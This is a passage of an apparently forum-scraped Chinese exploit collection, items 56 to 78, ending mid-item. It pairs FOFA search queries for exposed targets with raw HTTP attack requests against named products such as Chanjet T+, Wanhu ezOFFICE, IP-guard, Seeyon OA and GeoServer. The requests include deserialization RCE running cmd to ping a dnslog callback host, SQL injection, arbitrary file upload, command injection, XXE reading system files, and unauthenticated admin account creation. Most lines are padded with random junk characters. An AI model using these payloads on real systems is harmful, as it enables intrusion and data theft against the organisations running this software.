- ]9 p6 r8 o9 _7 {0 u
' U  B+ t1 z. @) w: b' ^56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
( f) v4 F7 d  \" ]FOFA: app="畅捷通-TPlus"
5 j/ Q, w9 Q+ C8 ]! v: q7 hPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
) W# [+ {. j5 nHost: x.x.x.x1 x5 M* f( F; y5 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36, W3 @9 z6 Y7 f& D- L9 X" r
Content-Type: application/json
9 R5 Q& S$ ^+ `' x) j1 M: H; b! V+ }$ T8 y( O8 S
{! m: F+ ^' T' s& \
  "storeID":{
+ q" i9 ^, p* e# T7 s    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",. M( W* C8 v1 k7 z' N
   "MethodName":"Start",
5 ]( T; m/ D$ {) u9 U# u3 C% X: w' }    "ObjectInstance":{
) W& h3 w: x4 n3 Q: b+ G  C       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* ]6 h: z0 L8 J+ |2 r4 r
        "StartInfo": {( i  h3 ?% v  x- b5 }) r4 Q
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",7 @$ \7 M3 O& U' C
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"* \2 J0 o4 N) X) P  |
       }
: ^% D' e9 k) ~& I- x    }7 {2 |: [1 N+ i/ E: ]( K
  }# E' o0 [1 w# t+ q5 ~
}4 F4 W+ I' [- @$ n* m2 L

' g3 Q: I2 V* i2 G5 c) G3 _6 E2 D2 [+ w, R9 `0 H; d7 k
57. 畅捷通T+ keyEdit.aspx SQL注入) C* u# U$ \( @/ k# [8 {! _
FOFA:app="畅捷通-TPlus"! N9 U9 ?# g7 U; x  s; P, Q$ O, S
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.12 d* T5 V& ]9 y) E: a8 K+ H3 Q
Host: host
' U* E: q* ?. l! g3 OUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* H% a' [' d: \. M' m0 M5 p
Accept-Charset: utf-8
$ ]2 \1 `: _3 w4 p0 PAccept-Encoding: gzip, deflate" O4 [; Q2 S5 D' f; t
Connection: close1 s' a, |( T/ U

4 u$ n& f, J& D- t' S5 M  m0 Y6 T+ _; N7 G
58. 畅捷通T+ KeyInfoList.aspx sql注入& V6 I4 X: p1 m, X
FOFA:app="畅捷通-TPlus"
/ S4 e0 q. o0 T+ i2 C* kGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
  a7 [" [; |) e  I( T! S. b6 R9 {# LHost: your-ip( Q" I  Z8 T' b& b
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. `7 w8 a  n* J; ~% @9 g  _; YAccept-Charset: utf-89 f. p* y& s0 D+ h. C/ Q; @$ ~8 O
Accept-Encoding: gzip, deflate9 s+ o' q. M. l6 _
Connection: close" q9 m8 m" q5 i/ A) t" U( }

% @& u+ ?- U- A0 [# j3 o  |
: @( K" d7 S6 \59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行# r: W9 j/ |; E  {
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd": Z5 m' r7 w( a. h) V, p
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
3 i: I$ G, {1 T) n, ?Host: 192.168.86.128:9090
7 F! }1 w- h  R6 _+ c, WUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
: l; }3 Z, a7 d4 [4 q- ~Connection: close, a; Q3 ^. ~3 g+ z  y# O* m$ `+ d
Content-Length: 1669
1 O! _% C( e& @Accept: */*- f1 I/ i7 {9 Y5 x* D
Accept-Language: en9 y5 A  j' a: T8 v5 g2 p, }
Content-Type: application/x-www-form-urlencoded8 L7 E1 T1 U; w8 b6 {/ `1 x
Accept-Encoding: gzip5 _! o* L6 r6 R# X

2 t. u  [8 s) Z, K- VPAYLOAD
4 k6 B- i9 T! U% O, O! {) ~
. S- a+ U$ U8 O9 V. ~* N" U; R& W  G# g$ S
60. 百卓Smart管理平台 importexport.php SQL注入/ X8 b; X: p0 F) X+ Q
FOFA:title="Smart管理平台"
9 J  f  M( x. I5 `% ]GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
+ ]' x: \: [. B6 n1 H% \- h' f) _  }Host:
* C* b% b+ o% ]1 r0 W7 t+ t  v6 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& Y# ]! C% w2 ^. g4 N7 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' n5 c1 c6 g7 \1 G
Accept-Encoding: gzip, deflate
& f* K' Q6 v! g1 y' I6 y9 H  sAccept-Language: zh-CN,zh;q=0.9
; f- f% a1 N: OConnection: close
5 o% V* ~! L- z- Y0 D* h9 @) n* V$ a+ N) B8 Y# h+ s- S6 y8 L7 c

2 M/ D" t5 G, m. y" N' i; Z61. 浙大恩特客户资源管理系统 fileupload 任意文件上传  t$ M3 D0 ^$ P" j
FOFA: title="欢迎使用浙大恩特客户资源管理系统"% J: R& h5 E3 v8 v* `2 C' V! f$ l
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
5 D% I/ p/ V6 ^2 _Host: x.x.x.x( y; Q7 E, D1 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' C1 ^$ K6 [$ L4 dConnection: close
* c$ Z7 {4 _$ Y; k: R; HContent-Length: 27, M+ [9 o% L! a5 o7 [$ Z
Accept: */*1 z0 C+ _/ x3 `" c3 |+ o
Accept-Encoding: gzip, deflate
. A5 `& X9 a2 H2 G% DAccept-Language: en4 f; V  z. p, t3 ]
Content-Type: application/x-www-form-urlencoded
/ C& r/ F3 I# m- r% _% F8 e( T- }
8uxssX66eqrqtKObcVa0kid98xa
. c5 x7 `$ [3 A3 L: M5 }3 D
; m& j9 u& ]7 L" \# N( t* _4 Z
62. IP-guard WebServer 远程命令执行5 \# R* j0 O. B
FOFA:"IP-guard" && icon_hash="2030860561"! d5 T9 }$ i6 V
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.17 X, W2 e! Z1 t" q
Host: x.x.x.x
# G0 G. t& [, N' ~8 w7 E8 D) F6 z0 B4 yUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.368 Z% V( i" B7 V) @8 b
Connection: close
! y5 Z1 u% p8 ?Accept: */*
6 M! j: v! R/ l( }! P8 Z. YAccept-Language: en5 C/ X/ a. P3 S1 X! c$ H
Accept-Encoding: gzip- A' O5 t* L/ [2 Q

% \9 ?+ d. D( s  y0 e6 _! A! |: ^' w+ ?& Y
访问+ w% D2 I' N, t! d6 J

: p  u' C( F% {& Z/ WGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1* _3 R7 e$ G$ g/ G
Host: x.x.x.x6 l; k4 J( ]1 ?& Z( D) U

' U# I% {& I) t) F
' r9 v9 G% S8 {2 U8 i; L63. IP-guard WebServer任意文件读取% ^1 P0 L- p8 F7 Q6 _/ O  p
IP-guard < 4.82.0609.0
; O: Y# D6 d$ q( KFOFA:icon_hash="2030860561"0 `, M9 I# g! X9 f2 r' ?
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1& e- j. }, X( P* Y, \* v  u
Host: your-ip
7 W$ Z, a; F8 Q' vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% K3 Z1 b4 `5 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: [7 @( U+ n- g- C: ZAccept-Encoding: gzip, deflate
3 }* q; J2 ~& w& ^Accept-Language: zh-CN,zh;q=0.9
8 ~! P- }: ]2 v! r/ b2 q; c" jConnection: close
4 `* D) X  y0 c( j7 u9 AContent-Type: application/x-www-form-urlencoded) x- S, ]& ^, |. z

, ?" C( x; t1 Zpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
: W$ \6 c& M* j/ V5 \9 }$ n' D5 b! R5 \( {, `" ?) V
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
( m4 C: G/ X/ ?0 |6 sFOFA:body="/Scripts/EnjoyMsg.js"
0 Z7 s: {' X3 uPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
, m/ P& @+ V8 u; R: A. QHost: 192.168.86.128:9001
) |8 ^( P$ g* q& p, l  ~User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
# V: }  E( N& d1 BConnection: close7 _  d/ V! J4 G  Y2 t3 |* a1 o4 b
Content-Length: 369) H- p6 H% G! R  V* F
Accept: */*
8 T8 F/ k$ G; a  V" IAccept-Language: en
! R6 Z5 O" ^  L3 P2 ?7 [Content-Type: text/xml; charset=utf-86 e7 l  S6 Y, k
Accept-Encoding: gzip
) }( G' _. D3 b
0 |; y* m, \4 u6 a" f/ x<?xml version="1.0" encoding="utf-8"?>
" l# R1 {" d+ u- w; p<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
8 [+ I3 d3 ~# S/ }* x<soap:Body>1 n8 `( Z6 A0 P' d( C
    <GetOSpById xmlns="http://tempuri.org/">
' ^. h% Q4 O! g      <sId>1';waitfor delay '0:0:5'--+</sId>$ h$ {% t! ?/ L+ B* h) L+ h
    </GetOSpById>
+ B( i  J8 W6 P* Q  </soap:Body>+ d( N# h! }' [6 V, H
</soap:Envelope>/ f8 p5 u; s# C
. ]! X$ I! O" V0 C4 |* w5 F8 n, r
" |# v' W/ R" n7 T& V( ~
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过( h, Q$ y3 X" w1 C) W- m
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
% ?+ g* x& ]8 w3 ?* }: T响应200即成功创建账号test123456/123456+ s5 X5 A4 ~* P& T# O8 s
POST /SystemMng.ashx HTTP/1.1: }3 z' b9 f* g! b: h
Host:! T4 [: n) R- A5 k4 t8 S- B
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" U2 p1 b0 W2 @1 D
Accept-Encoding: gzip, deflate
1 q8 R4 G+ j* ?' v5 }1 pAccept: */*: F% c" h! H8 K# a1 x2 c' O. i
Connection: close
; n3 o/ m* b" `6 p1 X  V& ~: XAccept-Language: en
0 }' d3 D3 d6 L1 W  y& x1 M5 sContent-Length: 174
5 u% M1 z* C# P3 U3 M4 c) q. k) ^
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
; {- g; i, ?; o! a; n7 Z3 }+ C* f; ?9 B: q

* T# P8 B3 Q- ?6 s66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
7 g! n! S+ f/ M) [1 N1 DFOFA:app="万户ezOFFICE协同管理平台"
# _* p) H% j( I9 G& a9 o# E9 Y- Z6 K% l: o) p/ @$ S
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1( U. T' L& y1 a8 E
Host: x.x.x.x! l1 v+ y+ N8 F( N6 `2 H7 v% e3 A1 f: i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ ^: a7 ]: b& H1 D% Z
Connection: close
4 }+ _3 f7 n. {. W9 eAccept: */*% O7 n6 P! m+ y2 F' N
Accept-Language: en
4 Z  v! B3 y6 }) \0 F4 f, QAccept-Encoding: gzip
( _( k% b* r& b$ E9 }5 u7 V6 d3 q3 R! O$ s5 E

9 b/ e0 S- g& v9 ~( B第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在. k4 {& h/ \8 O) j+ h! g$ x

" D# t" w& x, s% x9 \9 S67. 万户ezOFFICE wpsservlet任意文件上传# e' T6 u7 [6 m" N: f3 v
FOFA:app="万户网络-ezOFFICE"
: m$ |4 Z" q) D# T3 t) XnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
: L3 W4 g- u1 W/ c1 g) N! U% r# LPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
7 M/ F. @: f5 {# E* JHost: x.x.x.x8 W; ]9 T$ u( @  [
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
* s  {6 _$ B' P7 C/ X" h9 dContent-Length: 173
3 y0 L& n  d" r3 I" b7 B. \2 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
1 L  P( D) Y+ e5 q6 PAccept-Encoding: gzip, deflate& q3 v$ w) }- z0 `4 S6 N
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
6 }+ L  o6 |/ l" [& l3 YConnection: close
' v- {6 N/ u# Z; L* @. ]Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
+ u/ b0 ?1 b9 G/ D) j  \% ]DNT: 1
6 a! y9 b6 \/ i  Q3 h, [4 LUpgrade-Insecure-Requests: 1; I( K: h; l* A

2 r! M5 J# s- K( [--ufuadpxathqvxfqnuyuqaozvseiueerp
& l) F3 c+ ?7 C/ o7 Y9 V- qContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"/ b" c9 \% a6 f7 o' v' s5 P5 e% P

2 P3 O- x# A2 s' |7 b0 U<% out.print("sasdfghjkj");%>
* ^1 a' f( }6 g, [- H/ C+ M- |--ufuadpxathqvxfqnuyuqaozvseiueerp--7 T( \  k- X. g: j

8 T. G& V+ B! u* t: t& ?( M6 ?+ A7 E; W
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp( l( P- c: A( r6 F# ?. X. \
' l# \' W9 @1 G$ Q
68. 万户ezOFFICE wf_printnum.jsp SQL注入4 U, Q& C% {5 }6 p% `! _# M6 Y
FOFA:app="万户ezOFFICE协同管理平台"
* C( ?- z2 W2 W, kGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.16 h" Z7 O/ S/ {  ~
Host: {{host}}
4 _/ B+ O* I3 `7 q; N# mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.367 S* i2 T$ v5 J! m- W; e: v
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
" f. G5 i" b! ~$ ^# t8 v. q  [; |- pAccept-Encoding: gzip, deflate- d9 @6 @6 j2 q
Accept-Language: zh-CN,zh;q=0.9
- B* i& K- a: ]" m4 |  U& @Connection: close
: e4 `3 W8 X& i# z; Q- v
) K0 r, M) |8 k; n
& m/ r3 S% I! A2 W7 g- W: Y" b69. 万户 ezOFFICE contract_gd.jsp SQL注入
, U. y, t, v. w, O: p: b6 U: qFOFA:app="万户ezOFFICE协同管理平台"% W9 ~! P/ a2 `9 E
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
7 I: F/ |% k( |6 A+ M* }Host: your-ip/ `  S9 t0 ?! V8 M" q" l, @8 Z
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36. ]9 f  P( L8 _; X2 A: n  X! V4 q
Accept-Encoding: gzip, deflate1 _+ W2 r& K; g3 @7 J) h" _8 p0 U7 G# F
Accept: */*
7 X) u! U% f, E: |6 pConnection: keep-alive; T+ E1 E( O7 _$ c2 S
8 q3 Q( H9 N; S, @: _

! }& h& V! Q2 o; O) P2 b70. 万户ezEIP success 命令执行
) }# T' b' Y; [% O. EFOFA:app="万户网络-ezEIP"( Q7 S7 j' a, A5 c8 ?  k
POST /member/success.aspx HTTP/1.1$ F$ |/ o5 t  t7 Y3 p1 Y( H+ A
Host: {{Hostname}}4 l) v; B  X9 h. h% W3 x1 _6 j& K7 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.368 G( K, B8 k5 ^3 b* p
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=# [# K/ m# k2 o( p
Content-Type: application/x-www-form-urlencoded
; l( n4 Y- G( K& O& s: P+ |TYPE: C
# k3 _. ~( r) l4 B  I: {Content-Length: 16702
4 _& t' Z/ q  T1 k
9 a8 w8 c! M. P  w  w__VIEWSTATE=PAYLOAD3 c' Q( U, ?2 x: L6 i( b. m

5 ^  N  x/ a4 e* s+ D, Q" x' t. z; \& A
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入, D7 V! Z; M- Z+ b+ m
FOFA:body="PM2项目管理系统BS版增强工具.zip"
1 o. I" w' J8 f4 h: X* ^" YGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
% l, M) b  R+ i1 n& d" FHost: x.x.x.xx.x.x.x6 H& g6 E7 J0 m6 _+ N0 r
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 M5 Y. G1 O" p0 v* n0 D% i: dConnection: close- F: O# g: v6 f/ X/ Y5 |1 j& C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  u# m7 F# c1 I, ]
Accept-Encoding: gzip, deflate4 u. }) H6 w( g+ A( G. z% `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! W2 ~+ z; K' y6 ?Upgrade-Insecure-Requests: 1
, u4 n$ f. `- ]' K: R1 H3 R$ s
! P* _% Y2 W3 A+ X/ \5 t( a" o" B/ {' f& V
72. 致远OA getAjaxDataServlet XXE
- E& Q) \; j8 P) a; z, w$ a, w6 C) i$ MFOFA:app="致远互联-OA": Y6 \6 ]0 z( U- C4 q7 t6 d. Y1 e# p' \
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1. `5 U1 C8 @* f. o- v
Host: 192.168.40.131:8099- J# A* N5 ]" s8 F) G4 [  w8 n
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.364 |( Y/ q7 \! u8 @' G1 v. }+ X) t: g4 G
Connection: close" o* M4 G6 P6 d5 ^
Content-Length: 583
% u: e, Z/ m; c: ]& pContent-Type: application/x-www-form-urlencoded) w- F' V- B9 i
Accept-Encoding: gzip
% `$ O: u8 i) j- J' b+ \: l* B+ Y' d+ i
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E+ X% G  c/ C! Z8 P: ~
0 q2 W3 ^: s, l5 t. P/ A/ {
# U' q$ ]1 P2 _- h% R
73. GeoServer wms远程代码执行
- X( x( ~. i& Q3 J" |  s( p3 Z5 o% JFOFA:icon_hash=”97540678”
8 @! g- a  C$ v2 o. g+ B1 R7 VPOST /geoserver/wms HTTP/1.1) O. m& J/ ^' G4 J* ?& O
Host:
0 M! F' N. ~3 `7 {: wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' n! c1 i+ q) }0 p) |- W/ f' v' M* PContent-Length: 1981
" v* V- F9 R/ n% sAccept-Encoding: gzip, deflate
+ j  D1 ?0 {8 W# n2 lConnection: close
& i" p; U' E5 ^1 EContent-Type: application/xml1 q0 Z+ s& m# v; @, |7 \
SL-CE-SUID: 3( m& Y8 Y" q' p; o4 V) L# r( S' |7 h9 [

' O. Y. i" ?# |PAYLOAD5 g5 k8 G$ T: H' F

3 e0 H- \' J  Q& C. I2 a( s6 B- ^1 f% f0 {; l8 c( g. E1 J
74. 致远M3-server 6_1sp1 反序列化RCE" z+ S- ?/ c) @9 v& \
FOFA:title="M3-Server"
+ e  d: O8 n1 \( TPAYLOAD8 \6 A, @& W1 I# e) [
( n+ r7 ^, b7 P0 C
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
4 F2 x( k0 ]# Q6 {! p- T! x3 NFOFA:app="TELESQUARE-TLR-2005KSH": I* r$ u6 P3 B; `1 Y6 \* E
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1* D9 B. h  g% K  ]' f( j4 M
Host: x.x.x.x! {; S3 T* @, d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* H. u" [) b$ {9 g! LConnection: close8 D$ Z& J8 ]9 |4 u! i+ F! h% [
Accept: */*, I: E7 h2 y, {, j0 @
Accept-Language: en' `8 R; B2 o! p. {! J% e# k+ D
Accept-Encoding: gzip
5 W  w5 _0 S7 u1 d. U  |
0 H  X. H  N. f$ n  C- Y
& ]( [% e6 L7 |* S" EGET /cgi-bin/test28256.txt HTTP/1.13 O2 g+ h+ k2 R% i- x' P
Host: x.x.x.x
& H6 u+ k1 O0 B" a2 a4 {8 W
, V  K2 j; a% ]* t  K, G: K0 z& U7 G" q) A* \
76. 新开普掌上校园服务管理平台service.action远程命令执行
# q9 Y5 C# u( w% vFOFA:title="掌上校园服务管理平台"
. C' s0 Z& s& bPOST /service_transport/service.action HTTP/1.1/ q. H: c3 V" ^# q) n7 u' p
Host: x.x.x.x
  ?, @9 y. g. J7 P, lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0) {" |- Q! {* z. E+ |
Connection: close
( y) @5 G: ]' b5 j% ?9 h4 vContent-Length: 211
( a6 q2 N; s/ Y3 k# o4 N4 ^+ {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% v* S5 }+ n6 @8 S9 r1 y; ]: V, F: a
Accept-Encoding: gzip, deflate7 @. n2 m9 e4 E/ d" W8 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ w) }+ y) X# u, {* B, H8 ICookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4! X3 n6 F; k, [8 T6 _  H. w. n
Upgrade-Insecure-Requests: 14 U4 t* n0 V  Z% l$ y1 z6 c, D8 I  h

9 z6 u' e" n1 n. m7 V+ o{3 p! d+ z+ C3 I) p3 J
"command": "GetFZinfo",) x6 z: m1 r  v0 I
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\", J. w# c; i$ L6 U/ n
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"7 r! N: k; t" P. c( Z0 [6 U5 ^
}
' w. r# ]2 u4 ]- ^- K; [: _$ A( B2 K
; |' t4 r6 a0 H" c& R) m
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
+ C$ ^6 }3 Y9 H$ ^4 t0 p- I5 uHost: x.x.x.x
- L$ v1 z8 V. p( T6 H% t: y: }9 h. R+ B& X( H
. D( w9 L1 ]- M3 @0 M. [

; F9 f% \  u$ T% S$ J8 Q8 B77. F22服装管理软件系统UploadHandler.ashx任意文件上传
9 e; m! K+ d0 b. g: K: TFOFA:body="F22WEB登陆"
% d- V" o9 t; r4 a4 Y/ a$ }POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
& ^! G8 u7 r) C8 ]* l. IHost: x.x.x.x
$ y+ h; d- `% s) \0 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% ~) h6 ~$ `6 BConnection: close+ T* ?: q6 U* W0 @  O4 C4 u* L9 w
Content-Length: 433
) h: {" g2 l% R- K& nAccept: */*! i5 A: R4 z/ R* I& m
Accept-Encoding: gzip, deflate
, |9 T$ r# s% q, S5 y9 ~0 sAccept-Language: zh-CN,zh;q=0.9% x: _" h4 S! \7 V0 O  [
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
3 d& w$ c5 o* @: b' c  F% }! A$ b4 T4 `1 V
------------398jnjVTTlDVXHlE7yYnfwBoix. A' \. y) Z  m1 b( a# N) N( `
Content-Disposition: form-data; name="folder"7 Y5 q! P( P% _; j+ D+ W

+ z) w) c+ c) W  Y' D) Q; u) O) Q4 @# V/upload/udplog
( R6 {9 x0 r( Z" Q9 A  `------------398jnjVTTlDVXHlE7yYnfwBoix
8 x1 l; Z& B8 |, |' v0 V$ zContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
" K( D* E* ~% s2 O0 F- xContent-Type: application/octet-stream
5 q7 c* S+ _; |+ E& ?; x% I# ]5 h* N/ Z
hello1234567( `7 B+ b6 X0 m; V
------------398jnjVTTlDVXHlE7yYnfwBoix
  D+ B- I6 h7 U  ]. L% d' SContent-Disposition: form-data; name="Upload"1 ]+ g  x3 e, h* F

, t9 O& P( c" ]9 G' @( U5 A" uSubmit Query
4 {" y4 u  b% T9 x------------398jnjVTTlDVXHlE7yYnfwBoix--. I7 T5 }+ w/ |/ ^9 G- I

8 i5 `: _1 U4 G/ o7 N) C# W3 V  b+ V1 Q2 C  {/ l
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
1 r( p2 Y7 m, ?. j/ }$ y3 FFOFA:icon_hash="2001627082"! ?6 \' |9 ?% [9 y  T
POST /Platform/System/FileUpload.ashx HTTP/1.1  M) D- l! |) t$ @
Host: x.x.x.x7 f) P0 x) g: c: `9 H$ j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; Q8 p- n" H7 N
Connection: close
0 x; E3 M) I# _Content-Length: 3364 V. s9 ~3 o" w6 V; x" N( p
Accept-Encoding: gzip
% N. a6 r3 x+ zContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l: x' f4 N" r, m7 r5 j
6 R. W9 h( [2 L- j
